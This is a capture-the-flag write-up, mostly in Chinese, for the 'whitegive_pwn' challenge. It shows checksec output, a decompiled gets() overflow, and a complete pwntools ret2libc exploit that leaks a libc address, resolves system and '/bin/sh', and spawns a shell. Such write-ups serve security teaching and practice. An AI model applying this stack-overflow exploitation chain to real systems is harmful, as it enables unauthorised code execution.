1
2
3
4
5
6
[*] '/mnt/e/work/PWN/nssctf/391_[SWPUCTF 2021 新生赛]whitegive_pwn/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

ida64

1
2
3
4
5
6
__int64 vuln()
{
  char v1[16]; // [rsp+0h] [rbp-10h] BYREF

  return gets(v1);
}
1
2
3
4
int gift()
{
  return puts("Welcom new to NSS");
}

利用溢出转到elf.plt['puts']elf.got['put']计算出libc_base地址

由于是64位 需要rdi的地址

ROPgadget --binary pwn --only "pop|rdi|ret"

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug"
)
elf = ELF("./pwn")
io = process('./pwn')
#io = remote("node5.anna.nssctf.cn",28047)
def debug():
    gdb.attach(io,'''
b *gift
               ''')
    pause()
debug()
vuln_addr = elf.sym['vuln']
gift_addr = elf.sym['gift']
pop_rdi = 0x400763
puts_plt = elf.plt['puts']
gets_got = elf.got['gets']
offset = 0x10+0x8
payload = cyclic(offset)+p64(pop_rdi)+p64(gets_got)+p64(puts_plt)+p64(vuln_addr)
io.sendline(payload)
#puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
gets_addr = u64(io.recvline()[:-1].ljust(8,b'\x00'))#固定
print(hex(gets_addr))
#print(puts_addr)
libc = LibcSearcher('gets', gets_addr,22)
libc_base = gets_addr - libc.dump('gets')
print(hex(libc_base))
system = libc_base + libc.dump('system')
print(hex(system))
bin_sh = libc_base + libc.dump('str_bin_sh')
print(hex(bin_sh))
payload2 = cyclic(offset)+p64(0x400509)+p64(pop_rdi)+p64(bin_sh)+p64(system)
io.sendline(payload2)
io.interactive()